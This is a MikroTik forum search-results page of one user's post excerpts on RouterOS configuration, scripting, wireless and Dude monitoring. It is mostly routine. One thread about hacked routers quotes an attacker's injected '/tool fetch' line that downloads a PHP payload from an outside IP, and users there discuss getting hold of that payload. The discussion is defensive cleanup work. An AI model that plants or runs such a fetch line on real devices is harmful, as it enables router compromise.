MikroTik

excession

Thanks for the speedy clarification

excession

V7.9.2 I've found that if I set an OSPF filter with a general accept rule such as: if ( dst-len > 0 ) { accept} or simply accept All connected routes are now advertised via OSPF even if no route types are selected in the Redistribute option and even if there are no interface templates advertising th...

excession

Thanks for the help.

For anyone else who comes across this, I don’t know for sure, but my primary suspect is SKY-Q boxes exchanging video streams.

excession

Hi does anyone have a reference for the Eth. Protocol codes in the torch tool? Capture111.PNG I'm trying to figure out what the "7a7a" traffic is. Ether4 is part of a bridge with a single host attached to it (a sensor relay that should see almost no traffic). I assumed it was some kind of ...

excession

excession

Thank you!

excession

+1 I'm also curious if there's a syntax that will make this work.

excession

Ooh, I like the $div function and the $ifWanted. Some useful stuff for me here on ROS syntax, thanks. I noticed on my CRS328 that total useable power capacity is actually dictated by which port block you're on. So each block of 8 ports has a separate 150w capacity. Was thinking about adding an optio...

excession

Got a little annoyed trying to work with the standard POE monitor function, so wrote this little script to only show POE values for interfaces with POE demand and to calculate the total power draw. #poe-status :local poeOutStatus "" :local interfaceName "" :local poeOutPower 0 :l...

excession

Hello, My goal is to have - 4000 x VLAN interfaces - 4000 x VRRP interfaces (1 for each VLAN) - 8000 IP addresses - (1 ip for each VLAN + 1 ip for each VRRP) it seems the problem is with high number of VRRP interfaces. Above certain amount (trying to figure it out) some of the VRRP interfaces becom...

excession

We use Ruckus DPSK in the “group DPSK” mode. Like this it doesn’t care about MAC addresses, just that your device knows the PSK for that group. We tend to use it in MDU environments, one DPSK per apartment, landing the user on the associated VLAN for that DPSK.

excession

Other vendors have this feature.
Doesn’t seem like a patent issue if you don’t try and call it DPSK.

excession

Cambian have EPSK, which is basically the same thing.
Seems like marketing, rather than technical patent.

Good effort btw.

excession

That's a shame, but thanks for sharing your results.
I don't think Mikrotik quite get the use case we're going for here or why we'd like this slight change in the validation behaviour to start with.
Probably isn't going to change without some campaigning.

excession

I get that your experience has told you not to use MikroTik radios, but come on my Man, you’re on a MikroTik forum here; are you jumping on every forum post about setting up a hotspot or configuring caps-man and derailing the conversation buy telling everyone who’s come here for exactly this vendor ...

excession

I broadly agree with you Gotsprings, we too deploy a lot of Ruckus. But I also think there is a place in the Market for MikroTik and have found many places to successfully use their Radios as well. This isn’t a discussion over who’s better; just an examination of DPSK functionality and if it’s possi...

excession

The last time I tested this it didn’t work. I think that was v6.48. T do you run now v6.49.x to test it again? May it works in v7.x? When I get a chance I will try it again. I’ve kept a close eye on release notes and I’ve never seen any work on this topic though; sadly I get the impression that Mik...

excession

No problem, thanks a lot for testing and sharing 😀. I'm currently only on mobile so I cannot contribute anything. Would it still work if it is done with 2 rules like that but with different private-pre-shared-key? Like private-pre-shared-key="user1" vlan-id=1 private-pre-shared-key="...

excession

I know this is dumb. But how exactly?

excession

Are you able to cut the switch out in your testing? Connect a laptop or AP directly to the router?

excession

I notice your guest Vlan appears to have a slightly increased MTU but the underlying interface is ether 5 where as you've increased the MTU on ether 3? This looks odd to me. Also keep in mind any switches you then connect on to will need a correspondingly enlarged MTU. /interface ethernet set [ find...

excession

Presumably there will be some fixes between now and a stable release of v7 that might benefit this piece of hardware?

Seems there's no path for that to happen, just wait for v7.* stable? (Assuming I don't want to run a development release)

excession

Share your config:
export hide-sensitive

excession

We received a CCR2004-16G-2S+ this week that shipped with 7.0.4 installed. I've seen several people say 7.0.4 is a "special" release that's not publicly available and therefore you should be careful changing from it. Can anyone tell me at what point I should update this device and to what ...

excession

Hi, I'm looking at paring a CCR2004-1G-12S+2XS with a CRS326-24S+2Q+RM. I'd like to use a LAG to join the two, preferably using the 2 x SFP28 ports on the router and the QSFP ports on the Switch. I'm imagining it should be possible to get 20Gbps on each leg of my LAG, given that the QSFP is 4 x 10Gb...

excession

Hi rextended & excession, are you saying this added bit to a config will fix the problem temporarily? /ip dns static add forward-to=159.148.147.201 regexp=".*mynetname\\.net" ttl=10m type=FWD If you have a local Tik doing DNS for you (or another DNS server you can configure conditiona...

excession

Mikroitk's revolvers are still working, you can add a conditional rule to get your resolution working again:

159.148.147.201
159.148.172.251

/ip dns static
add forward-to=159.148.147.201 regexp=".*mynetname\\.net" ttl=10m type=FWD

excession

Mikroitk's revolvers are still working, you can add a conditional rule to get your local resolution working again:

159.148.147.201
159.148.172.251

/ip dns static
add forward-to=159.148.147.201 regexp=".*mynetname\\.net" ttl=10m type=FWD

excession

Mikroitk's revolvers are still working, you can add a conditional rule to get your resolution working again:

159.148.147.201
159.148.172.251

/ip dns static
add forward-to=159.148.147.201 regexp=".*mynetname\\.net" ttl=10m type=FWD

excession

viewtopic.php?f=2&t=178260
viewtopic.php?f=2&t=178256

excession

Domain Name: MYNETNAME.NET Registry Domain ID: 1856616582_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.publicdomainregistry.com Registrar URL: www.publicdomainregistry.com Updated Date: 2021-09-06T10:48:10Z Creation Date: 2014-04-29T08:21:38Z Registrar Registration Expiration Date: 2022-04-29T08:21...

excession

Oooh, that doesn't look good.

Name Server NS1.SUSPENDED-DOMAIN.COM

Anyone know on average how long it takes to resolve a suspended domain? They could just transfer it right?

excession

I'm also seeing issues through 1.1.1.1 and 8.8.8.8 in the UK.

4.2.2.4 and 208.67.222.222 are not working for me either.

https://dnschecker.org - Is showing about half the world unable to resolve these addresses right now.

Is there a service status page for Mikrotik's dynamic DNS?

excession

DO NOT WORK as expected read this: https://forum.mikrotik.com/viewtopic.php?f=9&t=154606&p=853803&hilit=firewall+connection+remove#p853800 haha I knew as I wrote that there was something I’d forgotten about this. Thanks, I’d read your post before; I’d even updated my script with it but ...

excession

Paste this on terminal: /interface wireless set wlan1 country=debug frequency-mode=superchannel tx-power-mode=all-rates-fixed tx-power=15 wps-mode=disabled station-roaming=disabled It's fun to see the superchannel "solution" recommended; often no-one mentions it, possibly in the hope that...

excession

I use this in both the up and down actions of a netwatch entry that pings my next hop gateway:

/ip firewall connection remove [find];
:log info ("Cleared-Connecitons");

excession

Great article, thank you very much! I have not included it here for simplicity, but we actually will have two AC's on site and it's my intention to make them both available to all clients. Since we won't have very many, possibly 10-20 PPPOE clients in the building, I had thought to just let each cli...

excession

Hi, we have a new build where we're going to offer internet service via PPPOE to various clients within a large building. A simplified view of the network is RTR -> Switch Stack -> PPPOE Clients. Simplified Overview: overview.PNG The switch stack will also be used for other things but I'm focused he...

excession

You, my friend, have re-discovered the wheel!
It's by design. Don't let anyone you don't trust with the password to every device, use your Dude...

excession

You can run a tool directly from any associated IP:

Capture.PNG

excession

Unfortunately you do have to set the device name manually. When I'm setting up a new map I often use the sysname OID on the appearance tab then manually set the device name as well. Alternatively when reverse DNS is available we sometimes use [Device.FirstDnsName] on the appearance tab instead, then...

excession

In v6> Dude, DNS names are allowed for adding devices. When those devices are ROS you can use them as agents as long as they are using exactly the same ROS version as your Dude server.

excession

Can you run windows commands from within Zabbix? In which case Winbox supports passing the following parameters. Try this in a run prompt: C:\winbox.exe IPAddress User Password (Above assumes you have winbox.exe in the root of your C: drive) All options are required to initialize the session without...

excession

Bash SSH script or Ansible if you have SSH enabled. Not as hard as you might think (assuming these are new to you). And since you can run any ROS command using the dude, although it’s designed to gather information, I’ve always thought it should be possible with the ROS CMD function in the Dude. Tho...

excession

Just throwing out this idea / haven't thought about it too hard / almost certainly won't work / wasting my time and yours...
Could you try calling the "FirstAddress" variable in a new dude function then use that dude function in it's place in your concatenate line?

excession

You can also make multi-device edits from the devices list, you can even filter that first if need be. Until Mikrotik develop an API for the Dude, this is your only practical solution. As I recall, someone did release their experiments decoding the Dude database on git-hub. They also alluded to the ...

excession

First create a system script with the following line, substitute your wlan interface name and the duration you want to run the snoop for, save it with the name "snoop": /interface wireless snooper flat-snoop wlan1 duration=5s Then run the following command to capture the output of that scr...

excession

SXTsq 5 ac seems to be out of stock everywhere in the UK. Is this just due to Covid, are new units incoming? Doesn't seem to just be the 5 ac either, most SXTsq products seem to be quite difficult to get hold of right now and the 60ghz unit appears to have been replaced entirely by the new Cube lite...

excession

We have both SSTP and L2TP/IPSEC setup on an RB3011. We see about 25mbps on SSTP and 40mbps on L2TP/IPSEC (an individual user testing one at a time), underlying connection is capable of 200mbps. We also deploy Soft-Ether quite often for our clients where they have either VMs or Windows servers avail...

excession

Below is my first stab at getting IPSEC monitoring of a ROS device into the Dude interface. Right now I've made two versions of the script, one for status indicators on a device and the other for on a link. The script pulls from the IPSEC Policies table, filters out templates and disabled entries th...

excession

Try station psudo-bridge instead of station bridge and put the wireless interface and the wired interface in a bridge together.

excession

Might be useful:
viewtopic.php?f=2&t=158367&e=1&view=unread#p780542

excession

Or I suppose as an outlier you might have a weird firewall rule or bridge filter that could prevent such a ping, but that’s pretty unusual.

export hide-sensitive

Post your config here if you want me to check.

excession

If your PC’s get an IP and can ping the Sonicwall when plugged into the wall port directly but not when plugged into the pass through port then it has to be an issue with the pass through ports. I’m not familiar with Grandstream handsets but I have come across configs on IP phones that disable the p...

excession

Are you sure there aren’t any VLANs configured on the switch? If your subnets are on different VLANs you need to make sure the pass through ports on your phones are on the right VLAN, which in this case is probably a different VLAN to the one the phones themselves should be on. It’s common in this k...

excession

Ha! That's gold. Initially when I tried to follow your instruction I tried to route the remote subnet to the gateway address of the local subnet, which didn't work. When I simply selected the interface of the local subnet instead it worked. I'm guessing the difference is that instead of trying to pu...

excession

It’s hard to be sure of your topology from your description, however.... It sounds like you would benefit from knowing that you can assign multiple IP addresses on different subnets to the same interface on a Mikrotik. So just add an IP to the Mikrotik’s LAN port that’s on the same subnet as the Son...

excession

Try pinging through your Mikrotik router from a client on the LAN side to a host in your GCP subnet. I’ve never been able to get a Mikrotik IPSEC peer to be able to talk to a remote subnet when building IPSEC tunnels but clients on the LAN side have communicated happily through those same tunnels. I...

excession

excession

It’s a fun idea, but I think I’d rather see a 2u front facing high density. Oh and stacking or expander functionality in ROS!

excession

Thanks for sharing.

excession

UPDATE: Looks like it was an issue with the Paravirtualized (virtio-net) adapter. Working properly now with the Intel MT1000 Desktop adapter. ---------- I'm having trouble getting my test setup to work on CHRs in VirtualBox. (Have tried enabling promiscuous mode on adapters as well.) VRRP interface ...

excession

You can run a ROS cmd and use it's output in a device label: [ros_command(":put [/ip ipsec active-peers print]")] Or you could add a device from the other side of the link to your map and use that to indicate the status of the tunnel. Or a combination of the two with the ros cmd output dis...

excession

You can display any OID value on a device map tile by modifying it's appearance settings.

Right click and Device on your map -> Appearance -> Label

You can use Insert OID to get an example to put a specific OID into or (having setup SNMP for that device) select the one you want from the list.

excession

I will eagerly watch this thread for an answer, because I could never find any utility or advantage to specifying either of them. Mainly you can set specific map icons for particular device types. You can also set required services for a device type and use custom services to automatically set the ...

excession

If you only need ROS devices, you can get a lot more info out of the CLI: /dude ros address print It's still not exactly what you want but with some additional processing and logic it might be workable. Or depending how your network is setup you could try de-duplicating the neighbors list: /dude ros...

excession

Thanks!

Also, how? I'm guessing you did some kind of bulk conversion?

excession

As far as I know you have to use SNMP for this.

excession

I've not tried this, however: Rather than try to use usermanger, I think what you want to do is set your NPS server as a direct RADIUS server for your Mikrotik then setup Mikrotik Vendor Specific Attributes in NPS to control bandwidth. Mikrotik Attributes: https://wiki.mikrotik.com/wiki/Manual:RADIU...

excession

This would be way more useful if the Access List didn't stop on the first failure but went on to try and validate against the next matching rule. You could then have multiple PSK's without defined MAC addresses allowing you to set different keys for different users without the need to pre-register M...

excession

Not seeing Mikrotik specific attributes in the docs: https://help.mikrotik.com/docs/display/ROS7/User+Manager How do we add Vendor Specific attributes? I'd like to be able to add: ATTRIBUTE Mikrotik-Wireless-PSK 16 string Or preferably have all Mikrotik attributes already defined. UPDATE: Looks like...

excession

You could bridge two ports together and feed your WAN into one of these. Then set one of your external IPs on this bridge, plug your next router into the other port and set another of your external IPs on that routers interface. You can then enable the IP firewall in Bridge Settings on the first rou...

excession

yep + another 1

excession

It’s not like the developers are unaware of these issues, almost certainly there’s a coder at Mikrotik who knows exactly what needs to be done to fix both this and several other stability issues but that it’s just not a priority for them at the moment, however much we would like it to be. It’s so fr...

excession

excession

Please, someone, where is the Dude?

Amen; let 2019 be the year of our Dude..

excession

GringoZ, There isnt an OID for everything you might need to have. However, the answer lies within the interface. As Normis says, you already used a command to show the OIDs. In the same case, the radio certainly knows what the SNR is, as well as many other valuable metrics. The radio is calculating...

excession

Quitting the Dude client then re-opening it and waiting normally works for me.

excession

+1 Please add

excession

It wouldn’t be such an issue if I could get it to rediscover ports when this happens.

Sometimes quitting dude client and reconnecting seems to help rediscover lost ports; but not reliably.

excession

Link line indicates which end the statistics for that link come from.
Something like a little bump or circle or perhaps an arrow at the end of the link line that shows you which end of the link the statistics are coming from.

Thanks!

excession

This saved me a lot of time, thanks for sharing.

excession

+1
This is still happening in 6.42.6. Any fix / workaround to force re-discovery of interfaces?

excession

Is he trying to use Winbox to connect No idea, but possible. how would you route a Winbox connection through a socks proxy? I assume that's a rhetorical question. Haha, actually no, just one based on an almost complete ignorance of socks! I did just find some interesting discussion here: https://fo...

excession

2. I have try to login to remote mikrotik with that password but no success so I think the problem come from the hacker allow only IP 127.0.0.1 to login with "sys" account. And the hacker use script to disable hard reset, so I just ask can I use the serial cable to login. (infected router...

excession

Thats it! THX! In scripts are /tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http Does anyone have the contents of the payload they can post? I've tried hitting the above but it's 404ing now. Thanks I grabbed the PHP file before fixing my router. I opened it with notepad a...

excession

Thats it! THX!

In scripts are
Code: Select all
/tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http

Does anyone have the contents of the payload they can post? I've tried hitting the above but it's 404ing now.

Thanks

excession

Since the attacker is inserting his script into the targeted routers and changing configuration in them, we recommend to carefully inspect the configuration of your device, restore it from verified backups or export files, and follow generic advice in the above links. What sorts of changes are bein...

excession

The above script worked fine for some time until we started to add VRRP interfaces on top of VLAN interfaces, these seem to take a little longer to negotiate state and in turn cause the master to bounce back and fourth between devices. Below are the script updates I've made to resolve the issue: #:l...

excession

Hi folks, I had some trouble finding script examples when I wanted to sync my VRRP interfaces. Thought I'd post my examples for what worked for me in the end, to hopefully signpost others. In my scenario: I wanted to ensure that all the VRRP interfaces across my two gateway devices had consistent st...

excession

When I say "Manually" I mean; from Terminal on the device. Where I get a blank response if I run /system health print. The boxes that fail are both mipsbe: routerboard: yes model: 2011iL current-firmware: 3.18 routerboard: yes model: 751U-2HnD current-firmware: 2.37 You're right of course,...

excession

Ahh that's brilliant thank you very much. Actually it makes me think of another issue I'm having. I have one (so far as I've found) box that crashes my script if I try to get health data from it. It's v6.20 but I have another v6.20 box that works just fine. I've tried manually running this process o...

excession

Hey, thanks for replying. I'm using php ver 5.4.24 and the export files I'm trying to transfer are all around 2k - 12k. I'm talking to various RouterOS versions but my test system is on ver 6.24. We ended up pushing rather than pulling just to have one less port open on these devices. Unfortunately ...

excession

Couldn't get it to work. In the end I scripted pushing the export file to an FTP server from the target device. //ftp transfer export file $addRequest = new RouterOS\Request('/tool fetch'); $addRequest->setArgument('address', '***.***.***.***'); $addRequest->setArgument('src-path', 'auto_export.rsc'...

excession

Hi Folks, I'm having trouble reading files via the PHP API. My script will happily make a backup file but I'm then unable to get that file back to the webserver: $util = new RouterOS\Util( $client = new RouterOS\Client('******', '******', '******') ); $filename = 'backup.rsc'; $addRequest = new Rout...

Search found 95 matches